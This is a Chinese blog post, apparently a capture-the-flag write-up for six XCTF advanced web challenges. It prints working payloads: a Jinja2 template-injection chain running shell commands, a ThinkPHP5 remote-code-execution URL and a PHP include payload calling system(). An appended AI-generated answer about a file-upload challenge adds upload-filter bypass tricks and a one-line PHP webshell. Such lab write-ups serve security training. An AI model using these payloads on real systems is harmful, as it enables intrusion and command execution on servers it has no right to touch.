攻防世界——web高手进阶区(1~6)

最新推荐文章于 2022-05-26 23:46:14 发布
原创 最新推荐文章于 2022-05-26 23:46:14 发布 · 748 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文介绍攻防世界Web高手进阶区1至6题的解题过程,包括baby_web、Training-WWW-Robots等挑战。通过利用各种Web漏洞获取flag,详细解析了从信息收集到漏洞利用的技术细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界——web高手进阶区(1~6)

(1)baby_web:

1.根据提示,在url中输入index.php,发现打开的仍然还是1.php
2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag

(2)Training-WWW-Robots:

直接先访问robots.txt:
在这里插入图片描述
然后在url在输入/fl0g.php,得到flag

(3)Web_python_template_injection:

首先构造/{{config}},没想到直接输出了全局变量的信息:

在这里插入图片描述

在执行管道命令
/{{’’.class.mro[2].subclasses()[59].init.func_globals.linecache.os.popen(‘ls’).read()}}
在这里插入图片描述
继续/{{’’.class.mro[2].subclasses()[59].init.func_globals.linecache.os.popen(‘cat fl4g’).read()}}
在这里插入图片描述
得到flag

(4)php_rce:

thinkphp5 漏洞利用
直接payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

在这里插入图片描述
得到flag

(5)Web_php_include:

打开网址,得到php代码提示

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

步骤:
1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。
2.默认页面为http://127.0.0.1/index.php,设置为page值,可确保while为真
3.利用hello参数将执行内容显示,flag如图所示

http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?system(%22ls%22);?%3E
http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?show_source(%22fl4gisisish3r3.php%22);?%3E

访问后

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
<?php
$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";
?>

得到flag

(6)supersqli:

此题博主基础有限,写不出好的解题思路,推荐攻防世界web进阶区supersqli
这里有详细的解体思路。

base呗
关注
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1539
继续ctf的旅程,开始攻防世界web高手进阶10分题,本文是Guess的writeup
攻防世界 web高手进阶 8分题 upload
闵行小鱼塘
08-28 546
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是upload的writeup
攻防世界Web高手进阶
xuhc25的博客
05-07 555
攻防世界Web高手进阶 文章目录1、aNNaNNaNNaN-Batman 1、aNNaNNaNNaN-Batman 题目: 下载下来得到附件,解压。 用txt打开 发现是一个JavaScript脚本。 看着有些乱码,试看看弹窗内容,把末尾的eval改成alert,然后后缀改为html。 双击浏览器打开,就能看到弹出内容。 这回看到是正经的代码了,整理得到如下代码。 function $(){ var e=document.getElementByld("c").value; if(e.
攻防世界web高手进阶 Web_php_include
weixin_61835841的博客
04-25 2065
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
xctf攻防世界 Web高手进阶 Zhuanxv
l8947943的博客
01-07 1624
1.进入环境,查看内容 没有什么其他信息,尝试dirsearch一下,如图: 发现有/list页面,我们尝试一下,发现让登录,如图: 猜测是需要想办法登入,从而拿到flag 2.问题分析 对内容进行抓包 先forward,然后再通过action送入repeater,如图: 发现图片是请求加载的,也就是通过后端传说过来的,那么可以响应的url,如图: 通过/loadimage?fileName=web_login_bg.jpg拿到了图片。既然知道了服务器的地址和请求路径,我们就通过路径访问得到项目的
攻防世界-Web高手进阶-Cat
feng的博客
09-13 499
这题其实并不能算是命令执行,主要涉及了输入宽字节字符导致报错,curl的@+文件名做本地文件读取,以及django的相关知识。
攻防世界-web高手进阶
zji
04-25 7050
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界———MISC 高手题解
热门推荐
小锤队长的博客
10-14 2万+
目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the-key.txt 9,glance-50 10,4-2 11,misc1 12,embarrass 13,肥宅快乐题 14,小小的PDF 至此 我在攻防世界中已经 遇到...
攻防世界WEB进阶——Cat wp
weixin_42499640的博客
07-31 1292
首先打开题目是个发现是个云端测试 提示输入域名 先输个baidu.com 没反应 输入百度的ip 220.181.38.148 反馈了 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transmitted, 0 receive...
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4884
尝试
攻防世界-web-高手进阶1-ics-06
wyj_1216 House
07-06 2943
题目 writeup 首先打开这个界面,看起来好高大上 随便点点 发先报表中心可以点进去界面 一开始还以为sql注入 尝试好多,没有回显 结果最后发现是爆破(哭) 爆破常规操作一波 得到当id=2333时,得到flag 知识点 爆破: https://blog.youkuaiyun.com/wyj_1216/article/details/90452373 见0x03Weak_auth ...
攻防世界---web---高手进阶
gclome的博客
11-09 656
1题–抓住那只猫
攻防世界-Web高手进阶-FlatScience
feng的博客
09-13 750
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界WEB 高手进阶writeup ()
weixin_44120313的博客
11-15 811
web 15. hide and seek 右键查看源代码 16. guestbook 爆数据库 --dbs 爆表 --tables 爆字段名 --columns 爆数据。–dump LFI 查看网址,可能存在文件包含漏洞 查看源码 读取pages/flag.php文件 读取pages/config.php文件 ...
攻防世界web高手进阶-baby web
weixin_61835841的博客
04-19 451
1.进入链接,一开始进去看到这个页面是 1.php,根据题目提示“想想初始页面是哪个,猜测应该存在 index.php,于是访问index.php输入之后直接跳转到了 1.php,猜测地址可能填写到了1.php。 2.打开火狐浏览器开发者模式(F12),选择网络模块,请求index.php,可以看到location参数被设置了1.php,并且得到flag。 总结:本题考查了web常见参数location的作用 ...
xctf 攻防世界 web wp 高手进阶(持续更新中)
m0_55854679的博客
06-22 399
baby_web 点击题目链接,可以看到一个1.php的页面。 题目要求是查看初始页面,在url后面添加index.php【单一入口的应用程序就是说用一个文件处理所有的HTTP请求,例如不管是列表页还是文章页,都是从浏览器访问index.php文件,这个文件就是这个应用程序的单一入口。由于所有的http请求都由index.php接收,所以可以进行集中的安全性检查,如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码。工作都被集中到了index.php来完成,可以减轻我们维护其他功能代
攻防世界(web)高手进阶
doraemon12345的博客
12-01 256
1.baby_web 打开题目,题目描述提示想想初始页面,打开是1.php, 改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flag flag{very_baby_web} 2.Training-WWW-Robots 看到题目想到robots.txt,尝试一下果然,看到fl0g.php 打开fl0g.php,拿到flag cyberpeace{27ec35e088ca35fa208f904330c15aad} 3.warmup 打开题目是个滑稽的表情,f12发现sou
攻防世界-Web高手进阶-ics-04
feng的博客
09-12 238
前言 终于自己成功做出来一道题了,信心大增。之前这题我做的时候发现题挂了。今天再来看,发现又好了,而且花了半小时居然做出来了!对于我这样的萌新来说真的是Nice. WP 根据提示,登录和注册页面存在漏洞。我们分别抓包,都进行一波分析。各个页面我都进行了查看,发现没什么发现,因此针对各个页面都进行SQL注入的检测,因为各个界面基本上都有输入,是关于用户名和密码,大概率和数据库相关,可能存在注入。 终于,在 ...
攻防世界Web 高手进阶:Lottery
feng的博客
09-04 1088
前言 这其实是我学了CTF的Web方向一个月以来做的第一道关于git泄露的题,之前发了几篇关于CTFHub中git泄露的题目,是因为我遇到这题的时候完全知识盲,去补了git知识然后相应的做了CTFHub的题目之后才敢来继续做这题。总的来说,这题还是很好的,考了git泄露的知识点,考了代码审计,考了php弱类型比较的知识点,还考了burp抓包相关的知识,这题虽然前前后后算上学习居然有一天,但是对于我这样的小白来说,收获还是巨大的。 WP 打开题目发现是个猜数字游戏,登录之后玩了玩发现买flag遥不可及,直接
攻防世界web的upload1
最新发布
03-21
<think>嗯,用户需要关于攻防世界Web部分的Upload1挑战的解题思路或writeup。首先,我应该回忆一下常见的Upload类题目的常见漏洞点,比如文件上传绕过、黑名单过滤、MIME类型检查、.htaccess利用内容检测绕过等。 根据提供的引用,其他Upload题目如upload3可能涉及Git泄露、远程命令执行漏洞(如ThinkPHP的RCE)或者数据库中的敏感表字段。可能需要扫描目录,利用工具如GitHack获取源码,或者通过上传webshell获取flag。例如引用[2]提到通过Git泄露获取源码,引用[4]使用了ThinkPHP的RCE漏洞执行命令。 对于Upload1,可能类似的思路适用。首先需要检查是否有前端验证,比如文件类型、扩展名的检查,是否可以被绕过,比如修改Content-Type、使用双扩展名(如.php.jpg)、或者大小写绕过(如.PhP)。此外,服务器可能配置了黑名单,需要尝试上传.htaccess文件来允许执行特定扩展名,或者利用解析漏洞,比如Apache的解析顺序问题。 另外,可能需要结合其他漏洞,比如文件包含,通过上传图片马,然后利用文件包含漏洞执行其中的代码。或者检查是否有二次渲染,使用绕过技巧。也有可能上传后文件名被重命名,需要找到上传路径和文件名规律。 查看用户提供的引用,特别是引用[3]中提到secret_table和fl4g字段,可能提示需要数据库注入或读取文件,比如通过上传PHP文件执行系统命令读取flag。引用[4]中的RCE payload可能相关,如果存在框架漏洞的话。 综上,解题步骤可能包括:检查前端验证,尝试绕过文件类型检查;上传webshell或恶意文件;利用解析漏洞或.htaccess;结合其他漏洞如文件包含或RCE执行命令获取flag。需要分步骤测试,并参考已有的writeup中的常见方法。</think>### 攻防世界 Web Upload1 解题思路 #### 1. **题目初步分析** - **目标场景**:文件上传类挑战,通常需要绕过上传限制,上传恶意文件(如Webshell)或触发漏洞获取服务器权限。 - **常见限制**:扩展名黑名单、MIME类型检查、文件内容检测、路径重命名等[^1][^3]。 #### 2. **关键步骤与绕过方法** 1. **检查前端验证**: - 通过浏览器开发者工具查看前端代码,确认是否有扩展名过滤逻辑。若存在,可手动修改请求绕过(如Burp Suite拦截修改`filename`)[^2]。 - 示例Payload:上传`.php`文件,修改为`.php5`或`.phtml`(若服务器解析此类扩展名)。 2. **绕过MIME类型检测**: - 若服务器校验`Content-Type`,需伪造类型(如`image/jpeg`),但文件内容仍保留PHP代码。 - 示例上传请求头修改: ```http Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg ``` 3. **利用.htaccess文件覆盖**(适用于Apache服务器): - 上传`.htaccess`文件,配置特定扩展名解析为PHP: ```apache AddType application/x-httpd-php .abc ``` - 后续上传扩展名为`.abc`的Webshell即可执行。 4. **文件内容绕过**: - 若服务器检测文件内容关键字(如`<?php`),可替换为短标签`<?=`或使用编码/混淆技术。 - 示例代码: ```php <?= system($_GET['cmd']); ?> ``` 5. **结合其他漏洞**: - 若存在文件包含漏洞,可上传图片马(如包含PHP代码的JPEG文件),通过包含触发代码执行[^4]。 - 若服务器存在已知框架漏洞(如ThinkPHP RCE),直接构造Payload读取Flag。 #### 3. **实战示例** 假设题目限制上传`.php`但未过滤`.phar`: 1. 上传Webshell文件`shell.phar`,内容为: ```php <?php system("cat /flag"); ?> ``` 2. 访问上传路径`/uploads/shell.phar?cmd=ls`,触发命令执行。 #### 4. **扩展技巧** - **双写扩展名绕过**:如`shell.pphphp`,若过滤逻辑为删除`php`字符串。 - **大小写混淆**:如`shell.PhP`(Windows服务器不分大小写)。 - **利用解析漏洞**:如`shell.php.jpg`被Apache解析为PHP(需特定配置)。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值